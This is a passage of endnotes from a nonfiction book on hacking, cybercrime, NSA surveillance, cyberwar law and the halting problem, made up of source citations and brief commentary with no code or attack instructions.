“Role models will”: “Pathways into Cyber Crime,” 9. The United States government has invested significantly in cybersecurity education programs and competitions, including CyberPatriot, picoCTF, Collegiate Cyber Defense Competition, US Cyber Camps, and US Cyber Combine.
support and advocacy: In addition, mentors produce better results when their professional development is a motivation for their participation (presumably motivating them to try harder), and mentorship sessions are longer and more frequent.
strong ones: Brewer et al., Cybercrime Preventions, 72.
gaming forums: According to the Hacker Profiling Project, 61 percent of hackers started hacking before age sixteen. Raoul Chiesa et al., Profiling Hackers: The Science of Criminal Profiling as Applied to the World of Hacking (Boca Raton, FL: CRC Press, 2008), 74. The NCCU reports that the average age of those suspected of and arrested for criminal hacking in the U.K. in 2015 was seventeen. By contrast, the average age of those arrested for drug crimes was thirty-seven and for economic crimes was thirty-nine. “Pathways into Cyber Crime,” 4. According to an early study of hackers, “A characteristic trait of all of our hacker interviewees recruited by organizations is the precocity of the emergence of a passion for IT: remarkably they agree on the fact that the enthusiasm emerges at the age of approximately ten”: Auray and Kaminsky, “Professionalisation Paths,” 1315.
given their skills: Lusthaus, Industry of Anonymity, 10–17.
Eastern Europe: Lusthaus, “Criminal Silicon Valley.”
to draft talent: U.S. law enforcement and intelligence service personnel have long recruited at hacking conferences: Janus Kopfstein, “NSA Trolls for Talent at Def Con, the Nation’s Largest Hacker Conference,” Verge, August 1, 2012, https://www.theverge.com/2012/8/1/3199153/nsa-recruitment-controversy-defcon-hacker-conference. In response to the Snowden revelations, and the hostility and betrayal many in the community felt, DEF CON organizers asked the U.S. government to sit out the 2013 meetings: Jim Finkle, “NSA at DEFCON? More Like No Spooks Allowed,” NBC News, July 11, 2013, https://www.nbcnews.com/technolog/nsa-defcon-more-no-spooks-allowed-6c10600964.
keep pace with demand: “Over an eight-year period tracked by Cybersecurity Ventures, the number of unfilled cybersecurity jobs grew by 350 percent, from one million positions in 2013 to 3.5 million in 2021. For the first time in a decade, the cybersecurity skills gap is leveling off. Looking five years ahead, we predict the same number of openings in 2025”: “Cybersecurity Jobs Report,” Cybersecurity Ventures, November 11, 2021. See also Paulette Perhach, “The Mad Dash to Find a Cybersecurity Force,” The New York Times, November 7, 2018. Cybersecurity spending is estimated to be $1 trillion from 2017 to 2021: “Global Cybersecurity Spending Predicted to Exceed $1 Trillion from 2017–2021,” Cybercrime Magazine (blog), June 10, 2019, https://cybersecurityventures.com/cybersecurity-market-report/.
fled the country: Jane Arraf, “Russia Is Losing Tens of Thousands of Outward-Looking Young Professionals,” The New York Times, March 20, 2022; Masha Gessen, “The Russians Fleeing Putin’s Wartime Crackdown,” The New Yorker, March 20, 2022, https://www.newyorker.com/magazine/2022/03/28/the-russians-fleeing-putins-wartime-crackdown.
especially severe: Anthony Faiola, “Mass Flight of Tech Workers Turns Russian IT into Another Casualty of War,” The Washington Post, May 1, 2022.
“Fucking Visa”: Brian Krebs, Spam Nation (Naperville, IL: Sourcebooks, 2014), 251.
Bitcoin: For the original white paper, see the (pseudonymous) Satoshi Nakamoto, “Bitcoin: A Peer-to-Peer Electronic Cash System,” https://bitcoin.org/bitcoin.pdf.
“over-the-counter brokers”: Connor Dempsey, “How Does Crypto OTC Actually Work?,” Circle Research, Medium, March 25, 2019, https://medium.com/circle-research/how-does-crypto-otc-actually-work-e2215c4bb13.
“surveillance capitalism”: Shoshana Zuboff, The Age of Surveillance Capitalism: The Fight for a Human Future at the New Frontier of Power (New York: PublicAffairs, 2019).
failed to patch: Dan Goodin, “Failure to Patch Two-Month-Old Bug Led to Massive Equifax Breach,” Ars Technica, September 13, 2017, arstechnica.com/information-technology/2017/09/massive-equifax-breach-caused-by-failure-to-patch-two-month-old-bug. Attackers exploited Apache Struts CVE-2017-5638.
Marriott International: Peter Holley, “Marriott: Hackers Accessed More Than 5 Million Passport Numbers During November’s Massive Data Breach,” The Washington Post, January 4, 2019.
difficult to sue: American courts have made it difficult to sue software companies for data breaches by denying aggrieved victims “standing.” To have standing to sue, parties must allege that they have suffered a “legally cognizable injury.” Courts have been reluctant, however, to treat having one’s personal information available for sale on a cybercriminal forum as a legally cognizable injury, deeming it too speculative: Jeff Kosseff, Cybersecurity Law (Hoboken, NJ: John Wiley and Sons, 2017), 52–64. On the inadequacies of data security law more generally, see Solove and Hartzog, Breached!
corporate culture: Thomas Fox-Brewster, “A Brief History of Equifax Security Fails,” Forbes, September 8, 2017, https://www.forbes.com/sites/thomasbrewster/2017/09/08/equifax-data-breach-history/?sh=1d6e6259677c.
from banking fraud: Ross Anderson, “Why Cryptosystems Fail,” 1st Conference on Computer and Comm. Security ’93 (1993); Ross Anderson, Security Engineering: A Guide to Building Dependable Distributed Systems, 2nd ed. (Indianapolis: John Wiley & Sons, 2008), 341–43.
Equifax agreed to pay: “Equifax to Pay $575 Million as Part of Settlement with FTC, CFPB, and States Related to 2017 Data Breach,” press release, Federal Trade Commission, July 22, 2019, https://www.ftc.gov/news-events/news/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related-2017-data-breach.
Facebook agreed to pay: “FTC Imposes $5 Billion Penalty and Sweeping New Privacy Restrictions on Facebook,” press release, Federal Trade Commission, July 24, 2019, https://www.ftc.gov/news-events/news/press-releases/2019/07/ftc-imposes-5-billion-penalty-sweeping-new-privacy-restrictions-facebook.
“monitoring and patching practices”: Jane Chong, “The Challenge of Software Liability,” Lawfare, April 6, 2020, https://www.lawfareblog.com/challenge-software-liability.
“affecting commerce”: Section 5 of the Federal Trade Commission Act (FTC Act), chap. 311, §5, 38 Stat. 719, codified at 15 USC §45(a).
computer by an intermediary: Chong, “Challenge of Software Liability.”
for unsafe vehicles: Jane Chong, “Bad Code: The Whole Series,” Lawfare, November 4, 2013, https://www.lawfareblog.com/bad-code-whole-series.
“accident-proof or foolproof”: Evans v. General Motors Corporation, 359 F.2d 822 (7th Cir. 1966), decided April 15, 1966.
trusted SolarWinds: Cozy Bear launched another supply-chain attack, placing malware in Microsoft Office copies sold by resellers. It also compromised the authentication system used by Microsoft and VMware, the largest developer of virtualization software, allowing hackers to exfiltrate emails and documents from affected systems. See Thomas Brewster, “DHS, DOJ and DOD Are All Customers of SolarWinds Orion, the Source of the Huge US Government Hack,” Forbes, December 14, 2020, https://www.forbes.com/sites/thomasbrewster/2020/12/14/dhs-doj-and-dod-are-all-customers-of-solarwinds-orion-the-source-of-the-huge-us-government-hack/?sh=20fce79d25e6.
“old-fashioned deterrence”: Anne Gearan, Karoun Demirjian, Mike DeBonis, and Annie Linskey, “Biden and Lawmakers Raise Alarms Over Cybersecurity Breach Amid Trump’s Silence,” The Washington Post, December 17, 2020.
OFAC freezing the assets: Executive order: https://www.whitehouse.gov/briefing-room/presidential-actions/2021/04/15/executive-order-on-blocking-property-with-respect-to-specified-harmful-foreign-activities-of-the-government-of-the-russian-federation/. OFAC notice: https://home.treasury.gov/news/press-releases/jy0126.
supply-chain attack: On the effort to increase supply-chain security, see White House, “Executive Order on America’s Supply Chains,” February 24, 2021, https://www.whitehouse.gov/briefing-room/presidential-actions/2021/02/24/executive-order-on-americas-supply-chains/, and White House, “Executive Order on America’s Supply Chains: A Year of Action and Progress,” https://www.whitehouse.gov/wp-content/uploads/2022/02/Capstone-Report-Biden.pdf.
Cisco routers sold to foreign countries: Glenn Greenwald, “How the NSA Tampers with US-Made Internet Routers,” The Guardian, May 12, 2014.
“And frankly we have more capacity”: Simon Sharwood, “Obama says USA Has World’s Biggest and Best Cyber Arsenal,” The Register, September 6, 2016, https://www.theregister.com/2016/09/06/obama_says_usa_has_worlds_biggest_and_best_cyber_arsenal.
The Echelon program: James Bamford, The Shadow Factory: The NSA from 9/11 to Eavesdropping on America (New York: Anchor, 2009), 14–16.
Crypto AG: Greg Miller, “The Intelligence Coup of the Century,” The Washington Post, February 11, 2020.
for close to two decades: See Adam Segal, “From TITAN to BYZANTINE HADES: Chinese Cyber Espionage,” in A Fierce Domain: Conflict in Cyberspace, 1986 to 2012, ed. Jason Healey (Vienna, VA: Cyber Conflict Studies Association, 2013).
F-35 fighter: Justin Ling, “Man Who Stole F-35 Secrets to China Pleads Guilty,” Vice, March 24, 2016, https://www.vice.com/en/article/kz9xgn/man-who-sold-f-35-secrets-to-china-pleads-guilty.
Office of Personnel Management: Ellen Nakashima, “Hacks of OPM Databases Compromised 22.1 Million People, Federal Authorities Say,” The Washington Post, July 9, 2015.
“There are two kinds”: Scott Pelley, “FBI Director on the Threat of ISIS, Cybercrime,” 60 Minutes, October 4, 2014, https://www.cbsnews.com/news/fbi-director-james-comey-on-threat-of-isis-cybercrime/.
signed a historic agreement: White House, Office of the Press Secretary, “FACT SHEET: President Xi Jinping’s State Visit to the United States,” September 15, 2015, https://obamawhitehouse.archives.gov/the-press-office/2015/09/25/fact-sheet-president-xi-jinpings-state-visit-united-states.
abided by this agreement: Prepared statement of Kevin Mandia, CEO of FireEye, Inc., before the U.S. Senate Select Committee on Intelligence, March 30, 2017, https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf.
FISA warrant to surveil Carter Page: “In re Carter Page, a US Person,” Docket Number: 16-11B2, https://www.judiciary.senate.gov/imo/media/doc/FISA%20Warrant%20Application%20for%20Carter%20Page.pdf.
makes it a felony: 50 USC §1809.
Snowden as a hero: According to a Gallup poll conducted from June 10 to 11, 2013, Americans were split on Snowden, with 44 percent agreeing with his action, and 42 percent disagreeing. See Frank Newport, “Americans Disapprove of Government Surveillance Programs,” Gallup, June 12, 2013, https://news.gallup.com/poll/163043/americans-disapprove-government-surveillance-programs.aspx.
any kind of hack: See Rebecca Riffkin, “Hacking Tops List of Crimes Americans Worry About Most,” Gallup, October 27, 2014, https://news.gallup.com/poll/178856/hacking-tops-list-crimes-americans-worry.aspx.
The Guardian: Glenn Greenwald, “NSA Collecting Phone Records of Millions of Verizon Customers Daily,” The Guardian, June 6, 2013, https://www.theguardian.com/world/2013/jun/06/nsa-phone-records-verizon-court-order. The Guardian article at this link says that the Verizon metadata article was published on June 6, but the archived version of the article shows that it was published the day before: https://web.archive.org/web/20130801184126/https://www.theguardian.com/world/2013/jun/06/nsa-phone-records-verizon-court-order.
June 6, 2013: Barton Gellman and Laura Poitras, “U.S., British Intelligence Mining Data from Nine U.S. Internet Companies in Broad Secret Program,” The Washington Post, June 7, 2013; Glenn Greenwald and Ewan MacAskill, “NSA Prism Program Taps into User Data of Apple, Google, and Others,” The Guardian, June 7, 2013, https://www.theguardian.com/world/2013/jun/06/us-tech-giants-nsa-data.
Pulitzer Prize: Gellman and Greenwald have publicly disputed priority over the Snowden scoops. See Mackenzie Weinger, “Gellman, Greenwald Feud over NSA,” Politico, June 10, 2013, https://www.politico.com/story/2013/06/edward-snowden-nsa-leaker-glenn-greenwald-barton-gellman-092505.
“largest in American history”: Chris Strohm and Del Quentin Wilber, “Pentagon Says Snowden Took Most U.S. Secrets Ever: Rogers,” Bloomberg, January 9, 2014, https://www.bloomberg.com/news/articles/2014-01-09/pentagon-finds-snowden-took-1-7-million-files-rogers-says.
bulk collection: As one might expect from a secret court in which only the government appears, the FISC’s rulings tend to follow the government’s interpretation of the law. As Orin Kerr has commented on an opinion that gave the government the expansive right to bulk-collect internet metadata, “By imagining that the statute provides more protection than it does, and by then construing the ambiguity in the statute in the government’s favor, the FISC’s opinion ends up approving a program that Congress did not contemplate using privacy protections Congress did not contemplate either. The resulting opinion endorses a program that appears to be pretty far from the text of the statute”: Orin Kerr, “Problems with the FISC’s Newly-Declassified Opinion on Bulk Collection of Internet Metadata,” Lawfare, November 13, 2013, https://www.lawfareblog.com/problems-fiscs-newly-declassified-opinion-bulk-collection-internet-metadata.
criticized the surveillance practices: See Jack Goldsmith, Power and Constraint: The Accountability Presidency After 9/11 (New York: Norton, 2012), 3–22.
Washington, D.C.: For a detailed description of the FISC procedures in 2013, see “Letter to Chairman Leahy,” Committee on the Judiciary, U.S. Senate, July 29, 2013, https://www.fisc.uscourts.gov/sites/default/files/Leahy.pdf.
kept secret: John Shiffman and Kristina Cooke, “The Judges Who Preside Over America’s Secret Court,” Reuters, June 21, 2013, https://www.reuters.com/article/us-usa-security-fisa-judges/the-judges-who-preside-over-americas-secret-court-idUSBRE95K06H20130621.
“this law means”: “In Speech, Wyden Says Official Interpretations of Patriot Act Must Be Made Public,” United States Senate, May 26, 2011, https://www.wyden.senate.gov/news/press-releases/in-speech-wyden-says-official-interpretations-of-patriot-act-must-be-made-public.
perhaps intentionally so: Charlie Savage, Power Wars: A Relentless Rise of Presidential Authority (New York: Back Bay, 2015), 174.
Laura Poitras’s riveting documentary: Laura Poitras, Citizenfour (2014).
one party outside: 50 USC §1881a, often known as Section 702 of the FISA Amendments Act (2008).
not because the NSA told us: The Office of the Director of National Intelligence has since published a helpful infographic: https://www.dni.gov/files/icotr/Section702-Basics-Infographic.pdf.
telephone metadata: Charlie Savage, “Disputed N.S.A. Phone Program Is Shut Down, Aide Says,” The New York Times, March 4, 2019.
search the email messages: Charlie Savage, “N.S.A. Halts Collection of Americans’ Emails About Foreign Targets,” The New York Times, April 28, 2017.
now made public: 50 USC §1872 (a).
Advocates: 50 USC §1803(i)(2).
annual statistics: 50 USC §1873.
Richard Clarke published: Richard Clarke and Robert Knake, Cyber War (New York: Ecco, 2010), 67. For a contrary view, see Thomas Rid, “Cyber War Will Not Take Place,” Journal of Strategic Studies 35 (2012): 1.
apply it to cyberwar: On the history of cyber-conflict, see Healey, A Fierce Domain; Fred Kaplan, Dark Territory: The Secret History of Cyber War (New York: Simon and Schuster, 2016); Ben Buchanan, The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics (Cambridge, MA: Harvard University Press, 2020); Adam Segal, The Hacked World Order: How Nations Fight, Trade, Maneuver, and Manipulate in the Digital Age (New York: Public Affairs, 2015); Kim Zetter, Countdown to Zero Day (New York: Crown, 2014); Andy Greenberg, Sandworm (New York: Doubleday, 2019).
Stuxnet: Zetter, Countdown to Zero Day.
monocultures are at serious risk: Paul Rosenzweig, “The Cyber Monoculture Risk,” Lawfare, October 1, 2021, https://www.lawfareblog.com/cyber-monoculture-risk.
In a federal system: By the same reasoning, we should expect, all other things being equal, digital homogeneity in the federal government. See Tim Banting and Matthew Short, “Monoculture and Market Share: The State of Communications and Collaboration Software in the US Government,” September 21, 2021, https://omdia.tech.informa.com/-/media/tech/omdia/marketing/commissioned-research/pdfs/monoculture-and-market-share-the-state-of-communications-and-collaboration-software-in-the-us-government-v3.pdf?rev=8d41cc2d16de491b9f59d2906309fdaa.
pay their taxes: Naveen Goud, “Ukraine’s Accounting Software Firm Refuses to Take Cyber Attack Blame,” Cybersecurity Insiders, 2011, https://www.cybersecurity-insiders.com/ukraines-accounting-software-firm-refuses-to-take-cyber-attack-blame; David Maynord, Aleksandar Nikolic, Matt Olney, and Yves Younan, “The MeDoc Connection,” Talos Intelligence, July 5, 2017, https://blog.talosintelligence.com/2017/07/the-medoc-connection.html.
In 1974: James Scott, Weapons of the Weak (New Haven, CT: Yale University Press, 1985).
“foot dragging”: Scott, Weapons, 30.
hack on Sony: David E. Sanger and Nicole Perlroth, “U.S. Links North Korea to Sony Hacking,” The New York Times, December 17, 2014.
DDoS-ed banks: Nicole Perlroth, “Attacks on 6 Banks Frustrate Customers,” The New York Times, September 30, 2012.
indicted in 2016: Department of Justice, “Seven Iranians Working for Islamic Revolutionary Guard Corps–Affiliated Entities Charged for Conducting Coordinated Campaign of Cyber Attacks Against U.S. Financial Sector,” press release, March 24, 2016, https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged; United States v. Ahmad Fathi, Hamid Firoozi, Amin Shokohi, Sadegh Ahmadzadegan, a/k/a “Nitr0jen26,” Omid Ghaffarinia, a/k/a “PLuS,” Sina Keissar, and Nader Saedi, a/k/a “Turk Server,” 16 Crim 48, https://www.justice.gov/opa/file/834996/download.
Shamoon: Nicole Perlroth, “Cyberattack on Saudi Firm Disquiets U.S.,” The New York Times, October 23, 2012.
Nomenklatura: Nomenklatura went after the File Allocation Table, not the Master Boot Record, but the idea is the same: corrupting the disk’s index, its mapping between physical space and digital information, to render the indexed information unavailable.
Cyber Partisans: Ylenia Gostoli, “How I Became the Spokesperson for a Secretive Belarusian ‘Hacktivist’ Group,” TRTWorld, February 10, 2022, https://www.trtworld.com/magazine/how-i-became-the-spokesperson-for-a-secretive-belarusian-hacktivist-group-54617. On hacktivism more generally, see Coleman, Hacker, Hoaxer, Whistleblower, Spy.
servers of the Belarusian railway: Sergiu Gatlan, “Hackers Say They Encrypted Belarusian Railway Servers in Protest,” Bleeping Computer, January 24, 2022, https://www.bleepingcomputer.com/news/security/hackers-say-they-encrypted-belarusian-railway-servers-in-protest/.
Russia employed cyberattacks: Thomas Rid, “Why You Haven’t Heard About the Secret Cyberwar in Ukraine,” The New York Times, March 18, 2022; Matt Burgess, “A Mysterious Satellite Hack Has Victims Far Beyond Ukraine,” Wired, March 23, 2022, https://www.wired.com/story/viasat-internet-hack-ukraine-russia/.
World War II: According to Article 2, Section 4, of the United Nations Charter, every member is prohibited from the “threat or use of force against the territorial integrity or political independence of any State.” United Nations Charter, Article 2(4). Article 51 makes an exception for self-defense. Under Chapter VII, the United Nations Security Council has the power to authorize military action for the sake of “international peace and security.”
The Internationalists: Oona A. Hathaway and Scott J. Shapiro, The Internationalists: How a Radical Plan to Outlaw War Remade the World (New York: Simon and Schuster, 2017).
new canteens: Oona A. Hathaway et al., “The Law of Cyber-Attack,” California Law Review 100 (2012): 817.
The preamble to the United Nations Charter: U.N. Charter, Preamble.
They were not: On the history of American interference in other countries’ elections, see Dov Levin, Meddling in the Ballot Box: The Causes and Effects of Partisan Electoral Interventions (Oxford: Oxford University Press, 2020); David Shimer, Rigged: America, Russia and One Hundred Years of Electoral Interference (New York: Knopf, 2020).
“norm of noninterference”: Oppenheim’s International Law, vol. 1: Peace, ed. Robert Jennings and Arthur Watts (9th ed., 1996), 428. Cf. Anthony D’Amato, “There Is No Norm of Intervention or Non-Intervention in International Law: Comments,” International Legal Theory (2001): 33–40. On the application of the Norm of Non-Intervention to cyberattacks, see Jens David Ohlin, Election Interference: International Law and the Future of Democracy (New York: Cambridge University Press, 2020); Harriet Moynihan, “The Application of International Law to State Cyberattacks: Sovereignty and Non-Intervention,” Section 3, https://www.chathamhouse.org/2019/12/application-international-law-state-cyberattacks/3-application-non-intervention-principle.
UKUSA agreement: U.S. State Army Navy, “Britain-US Communication Intelligence Agreement,” March 5, 1946. United States Treaties and Other International Agreements.
“The NSA does NOT”: Laura Poitras et al., “How the NSA Targets Germany and Europe,” Spiegel International, July 1, 2013, https://www.spiegel.de/international/world/secret-documents-nsa-targeted-germany-and-eu-buildings-a-908609.html.
Henry Stimson: Olga Khazan, “Gentlemen Reading Each Others’ Mail: A Brief History of Diplomatic Spying,” The Atlantic, June 17, 2013, https://www.theatlantic.com/international/archive/2013/06/gentlemen-reading-each-others-mail-a-brief-history-of-diplomatic-spying/276940/.
Turing’s proof: The proof presented here is different from Turing’s as set out in “On Computable Numbers” because his machines never halted. They ran forever. The exposition in the text follows the modern convention, first developed by Stephen Kleene in 1941, of using Turing Machines that halt. See generally Charles Petzold, “Turing and the Halting Problem,” Charles Petzold (blog), November 26, 2007, https://www.charlespetzold.com/blog/2007/11/Turing-Halting-Problem.html.
proof by contradiction: Here’s an example: To prove that the Tortoise is mortal, assume that the Tortoise is a reptile, all reptiles are mortal, but the Tortoise is immortal. If the Tortoise is immortal, then it can’t be a reptile because all reptiles are mortal. But the Tortoise is a reptile. Contradiction.
decidable problems are the exception: As Rice would later show, not just halting but all non-trivial semantic properties of programs—properties about how programs behave—are undecidable. H. G. Rice, “Classes of Recursively Enumerable Sets and Their Decision Problems,” Transactions of the American Mathematical Society 74, no. 2 (1953): 358.
Finally convinced: It’s my book, so I get to say that the imaginary student is convinced by my brilliant teaching.